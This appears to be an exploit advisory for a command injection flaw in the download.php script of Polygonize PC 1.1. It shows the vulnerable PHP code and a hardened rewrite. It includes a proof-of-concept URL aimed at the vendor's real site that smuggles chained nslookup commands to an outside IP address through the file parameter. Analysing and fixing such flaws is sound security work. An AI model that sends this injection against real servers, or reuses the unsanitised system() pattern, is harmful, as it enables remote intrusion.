Polygonize PC 1.1 Remote Command Execution

Polygonize PC version 1.1 suffers from a remote command execution vulnerability.


MD5 | 7c73f4a69f6242e7dc14c93875b326b5

============================================================================================================================
| # Title : Polygonize PC v1.1 RCE Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Tested on : Windows 10 Français V.(Pro) |
| # Version : 1.1 |
| # Vendor : http://polygonize.net/ |
| # Dork : http://www.zone-h.org/mirror/id/30699471 |
============================================================================================================================

poc :

<?php
/*************************************
* Code to download JPGs, PDFs, etc
* www.sometricks.com
*************************************/
// Vulnerable as shipped: $file is taken straight from the query string with no validation.
$file = $_GET['file'];
$file2 = "/var/www/cartoonize.net/web/tmp/".$_GET['file']; // built but never used below

// Unsanitised $file is interpolated into a shell command line: this is the
// command injection point (shell metacharacters such as | & ; reach /bin/sh).
system("/usr/bin/composite -gravity SouthEast watermark.png $file $file");

// The image check runs only AFTER the command has already executed.
if(@is_array(getimagesize($file))){
    $image = true;
} else {
    $image = false;
}
//print_r(getimagesize($file2));
//exit();
if ($image==true) {
    header ("Content-type: octet/stream");
    header ("Content-disposition: attachment; filename=".$file.";");
    header("Content-Length: ".filesize($file));
    readfile($file); // $file is also never confined to the tmp directory
}
else echo "Wrong image type";
exit;
?>

http://polygonize.net//download.php?file=nslookup%20213.32.6.8|nslookup%20213.32.6.8%26nslookup%20213.32.6.8
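For comparison, here is a hardened rewrite of the download.php handler above. This is an added example, not the vendor's code: the tmp directory is the one the original script references, the watermark path, the 64-character name limit and the allowed-extension list are assumptions. The fix is to validate the file name against a strict pattern, confine the resolved path to the download directory, check the image before running anything, and quote every shell argument with escapeshellarg() instead of interpolating user input into the command string.

```php
<?php
// Added hardened replacement for download.php (example code, not the project's own).

// Only serve files from this directory (assumption: same tmp dir the original script names).
const DOWNLOAD_DIR = '/var/www/cartoonize.net/web/tmp';
const WATERMARK    = '/var/www/cartoonize.net/web/watermark.png'; // assumed location
const ALLOWED_EXT  = ['jpg', 'jpeg', 'png', 'gif'];

// Returns the validated absolute path, or null when the request must be rejected.
function resolveDownloadPath(string $userFile): ?string
{
    // 1. Accept only a plain file name: no separators, spaces or shell
    //    metacharacters. This alone rejects the "nslookup ...|..." payload above.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$/', $userFile, $m)) {
        return null;
    }
    if (!in_array(strtolower($m[1]), ALLOWED_EXT, true)) {
        return null;
    }

    // 2. Resolve the path and confirm it still lives under DOWNLOAD_DIR
    //    (covers symlinks and traversal even if the pattern is relaxed later).
    $real = realpath(DOWNLOAD_DIR . '/' . $userFile);
    $base = realpath(DOWNLOAD_DIR);
    if ($real === false || $base === false || strpos($real, $base . '/') !== 0) {
        return null;
    }

    // 3. Verify it is really an image BEFORE any command runs.
    if (!is_file($real) || @getimagesize($real) === false) {
        return null;
    }
    return $real;
}

$path = resolveDownloadPath($_GET['file'] ?? '');
if ($path === null) {
    http_response_code(400);
    echo 'Wrong image type';
    exit;
}

// 4. Even with a validated name, never build the command by string interpolation.
//    The command template is fixed; each argument is individually quoted.
$cmd = '/usr/bin/composite -gravity SouthEast '
     . escapeshellarg(WATERMARK) . ' '
     . escapeshellarg($path) . ' '
     . escapeshellarg($path);
exec($cmd, $output, $rc);
if ($rc !== 0) {
    http_response_code(500);
    exit;
}

header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
```

The name pattern and the realpath() containment check are deliberately redundant: the pattern stops injection and traversal at the door, and the containment check keeps the handler safe if someone later loosens the pattern. Ordering also matters, since the original script ran the shell command before it ever looked at the file.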


Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================
